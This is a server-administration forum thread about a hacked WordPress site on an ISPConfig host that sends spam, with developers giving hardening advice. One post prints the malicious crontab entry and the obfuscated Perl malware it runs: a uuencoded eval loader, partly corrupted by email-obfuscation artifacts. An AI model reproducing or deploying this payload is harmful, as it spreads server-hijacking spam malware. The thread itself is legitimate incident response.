Wordpress havoc -- remote code execution problem

Discussion in 'General' started by NMR, Mar 11, 2019.

  1. NMR

    NMR New Member


    Please read complete before understanding the bug.

    This is not the first time we have encountered a website running wordpress on our ISPConfig Server.


    The hosted domain is able to fork/create processes, which in turn create/fork SMTP processes on the server and the hosted domain is able to listen and then starts sending emails for the hackers' pleasure. this is causing a big blunder on our side, causing the server being blacklisted on most of the RBLs and our legitimate customers are getting panic due to this.

    even though the PERL extension is disabled completely in the allowed executable paths , strange again, we have postfix already running on port 25 on the server, when I do an "lsof -i:25" is do that the default postfix and the forked processes listening on same port

    Below is the lsof -i:25 output
    see what 3rd column is saying, genuine SMTP Processes are running with root, while the forked process is running with the user of the hosted domain

    I have all details in the attached file, as the maximum size of the message here is 1000, please read the file completely.

    even though the perl is not in allowed components list, but the website can still run the perl executables very successfully.

    Attached Files:

  2. Croydon

    Croydon ISPConfig Developer ISPConfig Developer

    Reading your post I have to confess that I believe you have no real idea of how PHP, Perl and server security itself work …

    The option you mentioned (Perl inactive/active in ISPConfig) simply means that .pl files are not executed when called via web, e. g. https://yourdomain.com/myscript.pl.
    It does in no way mean (as that would not even be possible) that the web system user may not execute perl scripts on shell.
    So what happened at your server is that your web was hacked and either
    • the attacker created a cron job that belongs to the system user that then executes any script he wants
    • or the attacker executed the perl script directly
    This is normally done by using exec, shell_exec, system, backtick etc. operators in PHP. So before you claim to have found security bugs in ISPConfig and such scare other (not-so-experienced) users, read some texts about how to secure your websites.
    In short: Either use a WAF to prevent security wholes being misused or disallow the use of potentially risky functions in PHP (php.ini setting disable_functions)

    Last but not least: I hate (yes, personally I HATE) when users who have no idea of the technical backgrounds claim such "security bug nonsense".
  3. till

    till Super Moderator Staff Member ISPConfig Developer

    The title of your post is quite misleading as it claims to be about a bug in ISPConfig while what you posted is a misconfiguration of PHP on your server, so you might want to correct the title as other users might think that there is a bug otherwise. ISPconfig is not involved in the execution of the perl scripts nor in sending of these emails at all.

    Back to your original problem:

    You have a hacked WordPress site and this WordPress site started a script on your server which sends emails. This is possible only because you allow your customers to execute scripts.

    See here on how to disallow code execution from within PHP:


    You should set that e.g. for php-fpm and then limit all sites to use php-fpm. Don't set this for php cli as cli is commandline and cli scripts must be able to execute commands.
  4. NMR

    NMR New Member

    my apologies, if I have created a mess here or reported the ISPConfig as problem here,

    My concern is to make the product ( the ISPConfig ) more reliable and secure rather than being HATED by someone or being noticed for reporting the buggy problem about a Bug.

    my perception ( which you said is wrong as well ) that when you disable the PERL execution in the hosted domain, it should not allow perl for anything, but it is actually happening I can't rename perl for this user's env only.

    other than that, the processes created are not even giving any single clue how they were created ( the only option that is working is to go to the /proc/processid/ and then listing the exe which shows its a perl script which is sending emails from users through my system.

    in addition to this, I just noticed, there is no SMTP process, but the processes are just accepting emails from remote locations and then sending them to multiple locations/destinations. ( lsof -i:25 is showing is )

    again I apologize, but I need some help on this to get rid of these things.

    I just moved the websites to PHP-Mod from PHP-Cgi , will that work in any way..any other suggestions will be welcome.
  5. till

    till Super Moderator Staff Member ISPConfig Developer

    Really bad idea, mod-php is a completely insecure old PHP mode which allows a site access to all other sites, never use that on servers with more than one website. Switch it back immediately to either fastcgi or php-fpm.

    Like I mentioned above, your problem is not directly related to ISPConfig or the use of ISPConfig on your server. A user on any web server, no matter if it has ispconfig installed or not, can execute applications from within PHP unless you disable this PHP standard functionality. That the executed script is written in perl does not matter for the problem, it could be written in any programming language

    So how to fix and secure your server:

    1) Kill the currently running perl process which sends the email.
    2) Edit the global php-fpm php.ini file and disable the code execution functions there as described in the link that I posted.
    3) Restart PHP-fpm.
    4) Check the crontab of the web29, if it contains something, remove it:

    crontab -l -u web29

    5) Check if a new perl process was started in the meantime, in that case, kill it again.
    6) Check your website or all websites with a malware scanner to remove malware that was uploaded, you can do that e.g. with the free trial scan from ispprotect: https://ispprotect.com/
  6. till

    till Super Moderator Staff Member ISPConfig Developer

    The lsof is not showing that and an unprivileged user like web29 can never bind a program to a lower port, only root can do that. What lsof shows is that postfix is running on port 25, the sendmail command is used to send emails, sendmail is the standard command on Linux systems to send an email from scripts like shell scripts.
  7. Jesse Norell

    Jesse Norell ISPConfig Developer Staff Member ISPConfig Developer

    Check the website access log files, as if the site was breached via a wordpress core/plugin/theme vulnerability, you may well find helpful indications there. That's most likely, but also check ftp or ssh logs if you have ftp or shell users on the site, to see if a ftp or shell account has been (ab)used to add malware.

    Scan for malware like @till said. As this is a wordpress site, I would strongly recommend using wordfence, both as a WAF as @Croydon suggested and also to scan your website for malware/vulnerabilities. Generally multiple scanners are useful, as they all miss things. Ass you mentioned 'Forked processes have usual names like "postfix", sendmail, or exim4' you might even try a "grep -Erl 'postfix|sendmail|exim4' /var/www/domain.tld/web/" and investigate any files mentioned (though you will have false positives, matching those strings but not malicious).
  8. NMR

    NMR New Member

    Just found the problem -- thanks to Till for his patience and being a real mentor here.. Salute to You

    There is cronjob running under web29 user, which is executing the perl process every 10 minutes.

    [email protected]  server1   :~# crontab -l -u  web29
    */10 * * * * perl /var/tmp/WkWFJl >/dev/null 2>&1
    [email protected]  server1   :~# more /var/tmp/WkWFJl
    my $OTijZtzR;$OTijZtzR.=$_ while(<DATA>);eval(unpack('u*',$OTijZtzR));
    M(R$O=7-R+V)I;B]P97)L("UW#0IU<[email protected]<W1R:6-T.PT*=7-E(%!/4TE8.PT*
    M=7-E($E/.CI3;V-K970[#0IU<[email protected]\Z.E-E;&5C=#L-"B0P(#[email protected](GAI;F5T
    M9"([(&UY("@D<3$L("1Q,[email protected]/2`H(C`N-R(L("([email protected]*[email protected])'[email protected]/2`Q.R`F
    M;6%I;[email protected]*<W5B(&UA:6X-"GL-"F5X:[email protected],"!U;FQE<W,@9&5F:6YE9"`H
    M;[email protected])'!I9"`](&9O<FLI.PT*97AI="`P(&EF("1P:60[#0I03U-)6#HZ<V5T
    M<VED*"D[#0HD4TE'>R1??2`]("))1TY/4D4B(&9O<B`H<7<@*$A54"!)[email protected]
    M24Q,($9012!154E4($%"[email protected],2!314=6(%534C(@4$E012!!3%)-(%1%
    [email protected],1"DI.PT*=6UA<[email protected],#L-"F-H9&ER("(O(CL-"F][email protected]*%-41$E.
    M.PT*;W!E;B`H4U1$15)2+"`B/B935$1/550B*3L-"FUY("1U<F[email protected]/2!;(C<X
    M+C$R."XQ,3(N,3`V(ET[#0IM>2`D<FYD(#[email protected])A(BXN(GHB+"`B02(N+B):
    M(ET[("1R;[email protected]/2!J;VEN("@B([email protected]"1R;F1;;6%P('MR86YD($`D<[email protected]
    M+BXH-B`K(&EN="!R86YD(#4I*5TI.PT*;[email protected])&1I<B`]("(O=F%R+W1M<"([
    M(&EF("AO<&5N("A&+"`B/B(L("(O=&UP+R1R;F0B*[email protected]>R!C;&]S92!&.R!U
    M;FQI;[email protected](B]T;7`O)')N9"([("1D:7(@/2(O=&UP([email protected]?0T*;[email protected]*"1H96%D
    M97(L("1C;VYT96YT*3L-"FUY("@D;&EN:[email protected])&9I;&4L("1I9"[email protected])&-O;6UA
    M=&UL([email protected],[email protected](#$P*3L-"F9O<[email protected]@;[email protected])')S("A`)'5R;"D-"GL-
    M"B1H96%D97(@/2`B)&1I<B\B("[email protected]=&[email protected])&-O;G1E;[email protected]/2`D:&5A9&5R
    M("[email protected](C$B.PT*=6YL:6YK("1H96%D97(@:[email protected][email protected])&AE861E<[email protected]=6YL:6YK
    M="[email protected])&AE861E<[email protected])&-O;G1E;G0L(#`I.PT*:[email protected]*&][email protected]*$8L("(\([email protected]
    M)&AE861E<BDI#0I[#0IF;&]C:R!&+"`Q.PT*;[email protected]*"1T97-T+"`D=&%S:[email protected]
    M/2`H,"[email protected](B(I.PT*=VAI;&[email protected]*#Q&/BD-"GL-"G,O7EQS*BA;7EQS73\N*BDD
    M+R0Q+SL-"G,[email protected]*EM>7'-=*5QS*B0O)#$O.PT*;F5X="!U;FQE<W,@;&5N
    M9W1H("1?.PT*)'1E<[email protected]*[email protected]:[email protected])%\@[email protected](DA45%`O,2XP(#(P,"!/2R(@
    M?'[email protected])%\@[email protected](D-O;FYE8W1I;VXZ(&-L;W-E([email protected])'1A<[email protected]/2`D,2!I9B`O
    M#0HH)&QI;FLL("1F:6QE+"`D:60L("1C;VUM86YD+"`D=&EM96]U="[email protected]/2`F
    M9&5C>&0H)'1A<VLI(&EF("1T97-T(#T](#(@)[email protected];&5N9W1H("1T87-K.PT*
    M?0T*=6YL:6YK("1H96%D97(@:[email protected][email protected])&AE861E<[email protected]=6YL:6YK("1C;VYT
    M<B\B("[email protected]=&[email protected])&-O;G1E;[email protected]/2`B)&1I<B\D9FEL92([#0IU;FQI;[email protected]
    M)&AE861E<B!I9B`M9B`D:&5A9&5R.R!U;FQI;[email protected])&-O;G1E;[email protected]:[email protected][email protected]
    M)&-O;G1E;G0[#0HF:'1T<"@D;&EN:[email protected])'1I;65O=70L("1H96%D97(L("1C
    M;VYT96YT+"`Q*3L-"FUY("@D<F5S<"[email protected])'-I>F4I(#[email protected]*"(P,#`B+"`P*3L-
    M"FEF("AO<&5N("A&+"`B/"(L("1H96%D97(I*0T*>PT*[email protected]@,3L-
    M+BI;7EQS72E<<RHD+R0Q+SL-"FYE>'[email protected]=6YL97-S(&QE;F=T:"`D7SL-"B1R
    M97-P(#[email protected])#[email protected]:[email protected]+UY(5%107%,K7',K*%QD7&1<9"DO.PT*?0T*8VQO<[email protected]
    M1CL-"GT-"B1S:7IE(#[email protected]*'[email protected])&-O;G1E;G0I6S==(&EF("UF("1C;VYT
    M96YT.PT*)'-I>[email protected]/2`P(&EF("%D969I;F5D("1S:7IE('Q\("1S:7IE("%^
    M("]>7&0K)"\[#0II9B`H)'-I>[email protected]/B`P*0T*>PT*8VAM;[email protected],#<[email protected])&-O
    M;G1E;G0[#0IS>[email protected](G!E<[email protected])&-O;G1E;[email protected]/B]D978O;G5L;"`R/B8Q
    M8V]N=&5N="!I9B`M9B`D8V]N=&5N=#L-"F9O<[email protected]@;[email protected])')S("A`)'5R
    M;"D-"GL-"B1H96%D97(@/2`B+V1E=B]N=6QL([email protected])&-O;G1E;[email protected]/2`D:&5A
    M9&5R.PT*)FAT='`H)')S+"`Q,"[email protected])&AE861E<[email protected])&-O;G1E;G0L(#`L("(D
    M:60N)')E<W`N)'-I>F4B*3L-"GT-"F5X:[email protected],#L-"GT-"G-U8B!X;W)L#0I[
    M#0IM>2`H)&QI;F4L("1C;V1E+"`D>&]R+"`D;&EM*2`]("AS:&EF="[email protected](B(L
    M(#$L(#$V*3L-"F9O<[email protected]@;[email protected])&-H<B`H<W!L:[email protected]*"\O+"`D;&EN92DI
    M#0I[#0II9B`H)'AO<B`]/2`D;&EM*0T*>PT*)&QI;2`](#`@:[email protected])&QI;2`]
    M*SL-"GT-"G)E='5R;B`D8V]D93L-"GT-"G-U8B!D96-X9`T*>PT*;[email protected])&1A
    M=&[email protected]/2!P86-K("@B2"HB+"!S:&EF="D[#0I`7R`]('5N<&%C:R`H(D,U([email protected]
    M<W5B<W1R("@D9&%[email protected],"[email protected]@(B(I*3L-"G)E='5R;B`H)GAO<FPH<W5B
    M<W1R("@D9&%[email protected],"[email protected]<VAI9G0L("(B*2DL("9X;W)L*'-U8G-T<B`H)&1A
    M=&$L(#`L('-H:69T+"`B(BDI+"!`7RD[#0I]#0IS=6(@:'1T<`T*>PT*;[email protected]
    M*"1U<FPL("1T:6UE;W5T+"`D:&5A9&5R+"`D8V]N=&5N="[email protected])&UO9&4L("1G
    M96-K;[email protected]/2!`7SL-"B1G96-K;R`]("(R,#$P,#$P,2(@:[email protected]([email protected]
    M)&=E8VMO('Q\("%L96YG=&@@)&=E8VMO.PT*;[email protected]*"1H;W-T+"`D<&]R="[email protected]
    M)'!A=&@I(#[email protected])'5R;"`]?B`O7BA;7EPO.ETK*3HJ*%QD*BD_*%PO/UM>7"-=
    M*BDO.PT*<F5T=7)N('5N;&5S<R`D:&]S=#L-"FUY("1A9&1R(#[email protected]:&]S
    M?#[email protected]#`[#0HD<&%T:"!\?#[email protected](B\B.PT*)&%D9'(@/2!S;V-K861D<E]I;[email protected]
    M<&]R="[email protected])&%D9'(I.PT*;[email protected])')E861E<G,@/2!)3SHZ4V5L96-T+3YN97<H
    M*2!O<B!R971U<FX[#0IM>2`D=W)I=&5R<R`]($E/.CI396QE8W0M/[email protected]
    M+`T*(D=%5"`D<&%T:"!(5%10+S$N,2(L#0HB2&]S=#[email protected])&AO<W0B+`T*(E5S
    M97(M06=E;G0Z($UO>FEL;&$O-2XP("A7:6YD;W=S($Y4(#8N,[email protected][
    M('@V-#[email protected]<G8Z-C`N,"[email protected]:V\O)&=E8VMO($9I<F5F;[email protected]`N,"(L#0HB
    [email protected]=7,L96X[<3TD<3$B+`T*(D%C8V5P="U%;F-O9&[email protected]<"[email protected]
    M9&5F;&%T92(L#0HB06-C97!T+4-H87)S970Z($E33RTX.#[email protected][
    M<3TD<3(L*CMQ/21Q,2(L#0HB0V]N;F5C=&EO;[email protected]<V4B+`T*(EQX,$1<
    M7'@P1%QX,$$B+`T*(D=%5"`D<&%T:"!(5%10+S$N,"(L#0HB2&]S=#[email protected])&AO
    M,[email protected][('@V-#[email protected]<G8Z-C$N,"[email protected]:V\O)&=E8VMO($9I<F5F;[email protected]
    M.B!C;&]S92(L#0HB7'@P1%QX,$$B#0HI.PT*?0T*;[email protected])'-O8VME="`]($E/
    M.CI3;V-K970Z.DE.150M/FYE=RA0<F]T;R`]/B`B=&-P([email protected]'EP92`]/B!3
    M3T-+7U-44D5!32D[#0IR971U<[email protected]=6YL97-S("1S;V-K970[#0HD<V]C:V5T
    M+3YB;&]C:[email protected]*3L-"G5N;&5S<R`H)'-O8VME="T^8V]N;F5C="@D861D
    M*"1S;V-K970I.PT*)'1I;[email protected]*[email protected]=&EM93L-"FUY("1S=&5P(#[email protected],#L-
    [email protected]=6YD968L(#`N,#(I.PT*;[email protected])'=R:71A8FQE(#[email protected]*$E/.CI396QE8W0M
    M/G-E;&5C="AU;[email protected])'=R:71E<G,L('5N9&5F+"`P*2E;,5T[#0IF;W)E
    M86-H(&UY("1H86YD;&[email protected]*$`D=W)I=&%B;&4I#0I[#0II9B`H)'-T97`@/[email protected]
    M,"D-"GL-"B1S=&5P(#[email protected],2!I9B`D:&%N9&QE+3YC;VYN96-T960[#0I]#0II
    M9B`H)'-T97`@/[email protected],2D-"GL-"FUY("1R97-U;'[email protected]/2!S>7-W<FET92`H)&AA
    M;[email protected])&)U9F9E<BD[#0II9B`H9&5F:6YE9"`D<F5S=6QT("8F("1R97-U
    M;'[email protected]/B`P*0T*>PT*<W5B<W1R("@D8G5F9F5R+"`P+"`D<F5S=6QT*2`]("(B
    M.PT*:[email protected]*"%L96YG=&@@)&)U9F9E<BD-"GL-"B1R96%D97)S+3YA9&0H)&AA
    M.PT*?0T*?0T*96QS:[email protected]*"0A(#T](%!/4TE8.CI%5T]53$1"3$]#2RD-"GL-
    M>2`D<F5A9&%B;&[email protected]/2`H24\Z.E-E;&5C="T^<V5L96-T*"1R96%D97)S+"!U
    M;[email protected]=6YD968L(#`I*5LP73L-"F9O<[email protected]@;[email protected])&AA;F1L92`H0"1R
    M96%D86)L92D-"GL-"FYE>'[email protected]:[email protected])'-T97`@/"`R.PT*;[email protected])')E<W5L=#L-
    M"FEF("@D<W1E<"`]/2`R*0T*>PT*)')E<W5L="`]('-Y<W)[email protected]*"1H86YD
    M"GL-"B1R97-U;'[email protected]/2!S>7-R96%D("@D:&%N9&QE+"`D8G5F9F5R+"`X,3DR
    [email protected]/2`P.PT*?0T*96QS:[email protected]*&[email protected])')E<W5L="D-"GL-"FEF("@D
    M<F5S=6QT(#[email protected],"D-"GL-"FEF("@D<W1E<"`]/2`R*0T*>PT*;[email protected])&]F9G-E
    M="!I9B`D;V9F<V5T(#[email protected],#L-"FEF("AO<&5N("A&+"`B/CXB+"`D:&5A9&5R
    M<B`H)&)U9F9E<[email protected],"[email protected])&]F9G-E="D[#0IC;&]S92!&.PT*?0T*<W5B<W1R
    M("@D8G5F9F5R+"`P+"`D;V9F<V5T("[email protected]"[email protected]/2`B(CL-"B1S=&5P(#[email protected],SL-
    M"GT-"FEF("@D<W1E<"`]/2`S*0T*>PT*:[email protected]*&QE;F=T:"`D8G5F9F5R*0T*
    M>PT*:[email protected]*&][email protected]*$8L("(^/B(L("1C;VYT96YT*2D-"GL-"F9L;V-K($8L
    M?0T*)&)U9F9E<B`]("(B.PT*?0T*?0T*;F5X=#L-"GT-"B1T:6UE;W5T(#[email protected]
    M97AT.PT*?0T*96QS90T*>PT*)'1I;[email protected]/2`P.PT*?0T*?0T*:[email protected]*"1T
    M:6UE;W5T(#[email protected]=&EM92D-"GL-"F9O<[email protected]@;[email protected])&AA;F1L92`H)'=R:71E
    M/G)E;6][email protected]:&%N9&QE*2!I9B`D=W)I=&5R<RT^97AI<W1S*"1H86YD;&4I
    M.PT*)')E861E<G,M/G)E;6][email protected]:&%N9&QE*2!I9B`D<F5A9&5R<RT^97AI
    M<W1S*"1H86YD;&4I.PT*8VQO<[email protected])&AA;F1L93L-"GT-"G)E='5R;CL-"GT-
    [email protected]  server1   :~#   
  9. NMR

    NMR New Member

    just another question -- can we disable crontab for a specific user?
  10. till

    till Super Moderator Staff Member ISPConfig Developer

    Add the username of the web user to /etc/cron.deny file. But be aware that this probably will disable cronjobs for this website in ISPConfig too.
  11. till

    till Super Moderator Staff Member ISPConfig Developer

    But when you disable exec functions in PHP as mentioned in my earlier posts, then an attacker will not be able to add a cronjob. So disabling crontab is not important anymore then.
  12. NMR

    NMR New Member

    which means

    if I remove the crontab and the executing file , the user should not be able to run the same profiled process whether or not I disable the user in crontab.deny.
  13. till

    till Super Moderator Staff Member ISPConfig Developer

    If you disabled exec functions in PHP and remove the file and crontab entry, then the user should not be able to re-add it. And ensure that you clean the WordPress site for malware too with a malware scanner.
  14. Jesse Norell

    Jesse Norell ISPConfig Developer Staff Member ISPConfig Developer

    Also ensure the site has a sane open_basedir setting.

Share This Page